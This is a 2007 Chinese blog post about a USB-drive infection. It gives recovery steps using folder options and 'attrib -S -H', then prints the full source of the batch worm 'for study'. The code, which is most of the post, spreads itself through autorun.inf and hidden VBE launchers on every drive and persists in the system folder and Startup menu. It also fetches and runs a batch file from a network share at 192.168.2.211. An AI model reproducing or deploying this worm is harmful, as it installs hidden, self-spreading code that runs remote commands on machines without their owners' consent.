u.vbe 又弱智又善良的“病毒”

     最近总觉得很忙很累,倒霉的事却一件接一件地来,而今天早上又发生了一件让我急坏了的事情.
     昨晚论文指导导师找我谈论了关于我的论文修改意见,说是最迟要明天早上交给其他导师评分了,要求我把论文再给修改修改(因为要拿优秀,也就没办法了),因此,我只能开夜车把论文给赶出来,也好第二天早上打印后交上去,然后去做其他事情.
     原本是这么计划的,也比平时早起了几十分钟(这几十分钟对我来说实在是太宝贵了,况且是在早晨),然后带着2G容量的u盘下去打印论文,可结果呢,当我打开u盘的时候，看到很多要么是好像坏了的文件夹，要么是exe格式的文件，这下可坏了，我的论文难道就这样给毁掉了？！！还有我长期开发积累起来的应用程序呢？？我很无奈，我只能怪打印处的机器，是它们干的好事，而打印处的sb们除了会用鼠标按打印按钮之外，其他的连给屁都不懂，唉，shit一个字！
     一开始我断定是感染了病毒（事实证明这个病毒应该用双引号给引起来），所以我换了几台机器试图证明点什么，但最终还是让我发现了新大陆：

第一步：打开“我的电脑〉工具〉文件夹选项〉查看”后，其中在这个“高级设置”对话框中，需要做两件事，一是把“隐藏受保护的操作系统文件（推荐）”选项去掉沟沟，二是把“显示所有文件和文件夹”给选上去，之后再按“应用”和“确定”即可。

此时，你应该看到了u盘中多了很多隐藏类型的文件夹，而这些文件夹跟exe格式文件的文件名前缀完全一样，当你打开它后发现你原来的东西还在，里面的内容什么都没有改变过，只是变成了受保护的隐藏文件夹。这时，事情就好办了，你大可以把u盘中原来没有的文件给删除掉，原来的文件继续可以使用。

但是并不意味着你大功告成，因为我发现有些“感冒”严重的机器，第一步的操作根本就没效，即是隐藏受保护的操作系统文件（推荐）”等功能修改不成功，即使你按照第一步操作，然后你再次打开这个对话框，你会发现这些状态仍然保持原来的样子（无奈）。这时是否意味着已经无能为力了呢？答案为否。

接着做第二步：

打开“开始〉运行〉输入cmd开发命令窗口”，然后进入U盘（以I盘符为例），做以下操作
cd I:\\ (回车)
I: (回车)

attrib -S -H * /D /S (回车)

或

打开cmd后直接输入
attrib -S -H I:\\* /D /S (回车)

在此等待一段时间，你会发现你原来的文件夹全恢复为非隐藏状态了（否则重复以上操作），这才算大功告成！！！！！

后来，我把这个搞搞振的“病毒”备份了一份，带回去研究了一下，结果发现，这个“ 病毒”在计算机病毒定义的三个特性（传播性、潜伏性、破坏性）并不具备破坏性，倒是觉得该“病毒”的作者太过于“善良”了，具有很强的玩弄u盘使用者的味道。

     该“病毒”具有以下特征：
        1、其不会对A,B盘造成任何影响
        2、其把你原来的文件夹的属性设置为存档、系统文件、只读和隐藏，然后新建一个前缀名与文件夹名一样的exe文件
... ...
     目前暂时发现这么多，如果时间允许的话我想继续挖掘挖掘，希望能为广大的u盘使用者提供有用的帮助

！

以下是该“病毒”的部分源代码（仅供学习之用，希望与对此感兴趣的高手交流交流）：

-------------------------------------------------------------------------------------------
2

@echo off
3

setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
4

cd /d "%~dp0"
5

if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
6

set v=01
7

set "endf=%systemdrive%\8bye.txt"
8

call:ie s.vbe
9

echo.Wscript.sleep 10000>s.vbe
10

attrib s.vbe +a +s +r +h
11

if /i not "%cd%"=="%systemroot%" (call:cb&del /a /f /q s.vbe&goto :eof)
12

set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
13

set n=0
14

call:inf >inf.tem
15

call:ql
16

uda.a
17

md "%systemroot%\bakfiles\"
18

call:ie "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
19

copy uda-解压.bat "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
20

call:ie "%systemroot%\bakfiles\uda.a"
21

call:copy uda.a "%systemroot%\bakfiles\"
22

:s
23

echo. >uhere-%v%.txt
24

if exist "%endf%" (set n=1&goto end)
25

if "!dl:~%n%,1!"=="" (set n=0&s.vbe&(ping 192.168.2.211 -n 1 &&call \\192.168.2.211\re$\add.bat))
26

set d=!dl:~%n%,1!:
27

set /a n=n+1
28

if not exist %d% (goto s)
29

if exist "%d%\autorun.inf\" (echo.y|cacls "%d%\autorun.inf" /p everyone:f
30

rd "%d%\autorun.inf" /s /q)
31

if exist "%d%\autorun.inf" (fc "%d%\autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盘病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1)
32

if not exist "%d%\%~n0.vbe" (goto s2)
33

if not exist "%d%\%~nx0" (goto s3)
34

if not exist "%d%\uda.a" (goto s4)
35

if exist %d%\%date:~0,10%.sk (goto s)
36

:s1
37

call:inf >%d%\autorun.inf
38

attrib %d%\autorun.inf +a +s +r +h
39

call:ie "%d%\%~n0.vbe"
40

:s2
41

call:vbe "%~nx0" >"%d%\%~n0.vbe"
42

attrib "%d%\%~n0.vbe" +a +s +r +h
43

:s3
44

call:copy "%~dpnx0" "%d%\"
45

:s4
46

call:copy "uda.a" "%d%\"
47

call:ie %d%\*.sk
48

echo.>%d%\%date:~0,10%.sk
49

attrib %d%\%date:~0,10%.sk +a +s +r +h
50

goto s
51

:cb
52

if exist "%systemroot%\uhere-*.txt" (del /a /f /q "%systemroot%\uhere-*.txt"&s.vbe)
53

if exist "%systemroot%\uhere-*.txt" (if exist "%systemroot%\uhere-%v%.txt" (goto :eof) else (call:v "%systemroot%\uhere-*.txt"&(if %v% lss !v0! (goto :eof))))
54

call:rm >%systemdrive%\已经被反U盘病毒的“病毒”感染.txt
55

call:copy "%~dpnx0" "%systemroot%\"
56

call:copy "uda.a" "%systemroot%\"
57

call:ie "%systemroot%\%~n0.vbe"
58

call:vbe "%~nx0" >"%systemroot%\%~n0.vbe"
59

call:ie "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
60

call:vbe "%systemroot%\%~nx0" >"%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
61

start "" /wait /d "%systemroot%\" "%systemroot%\%~n0.vbe"
62

goto :eof
63

:v
64

set "v0=%~nx1"
65

set /a "v0=%v0:~6,2%"
66

goto :eof
67

:rm
68

echo. 看到这个，请不要慌张。电脑病毒的定义为：1、传播性；2、潜伏性；3、破坏性。根据此定义，本脚本这完全符合1，有点符合2，不符合3（若说破坏性也不是没有，但只针对U盘病毒，而且会在删除文件前备份，备份地址：%systemroot%\bakfiles\），因此，病毒二字加了引号，即不是真正的病毒。本脚本的目的是通过U盘传播，并沿途清理U盘中的病毒，如果可能，会把收集到的病毒文件发给作者；不会给您造成太多不便（与其被U盘病毒感染，不如被本脚本感染啦）。如果您觉得这样给您造成了不便，想卸载本脚本，请在%systemdrive%\下新建一个名为8bye的文本文件（不需要写入内容，即：新建%endf%），大约在20秒内完成卸载，并帮助您进行U盘病毒免疫。欲了解更多，请打开 U盘病毒分析的自述文件（地址：%systemroot%\readme.txt）。谢谢！
69

echo. 包含文件：u.bat（本文件，4240字节）、uda.a（21674字节，md5：e6762ebf6123bc17ab31995c61bba955）
70

goto :eof
71

:vbe
72

echo.wscript.createobject("wscript.shell").run """%~1"" /start",0
73

goto :eof
74

:inf
75

echo.[AutoRun]
76

echo.open=wscript.exe %~n0.vbe
77

echo.shell\open\Command=wscript.exe %~n0.vbe
78

echo.shell\explore\Command=wscript.exe %~n0.vbe
79

echo.shell\find\Command=wscript.exe %~n0.vbe
80

goto :eof
81

:ie
82

if exist "%~1" (del /a /f /q "%~1")
83

goto :eof
84

:copy
85

call:ie "%~dp2%~nx1"
86

attrib "%~1" -s -h
87

copy "%~1" "%~dp2"
88

attrib "%~1" +s +h
89

attrib "%~dp2%~nx1" +s +h
90

goto :eof
91

:ql
92

cd /d "%systemroot%\"
93

del /a /f /q Anti-U盘免疫.bat ReadMe.txt uda-解压.bat U盘病毒分析.bat zap.a 主操控.bat 打开发送功能.bat
94

cd /d "%~dp0"
95

goto :eof
96

:end
97

set d=!dl:~%n%,1!
98

echo.%d%:\
99

if exist %d%:\ (del /a /f /q %d%:\u.vbe %d%:\u.bat %d%:\uda.a)
100

set /a n=n+1
101

if not "!dl:~%n%,1!"=="" goto end
102

call U盘病毒分析.bat -c&call:ql&del /a /f /q "%systemdrive%\已经被反U盘病毒的“病毒”感染.txt" "%~dp0s.vbe" "%endf%" inf.tem "uda.a" "%~n0.vbe" "uhere-%v%.txt" "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe" "%~nx0"
103

--------------------------------------------------------------------------------------------
104

posted on 2007-06-02 11:18 dengqiye 阅读(1593) 评论(0) 编辑收藏举报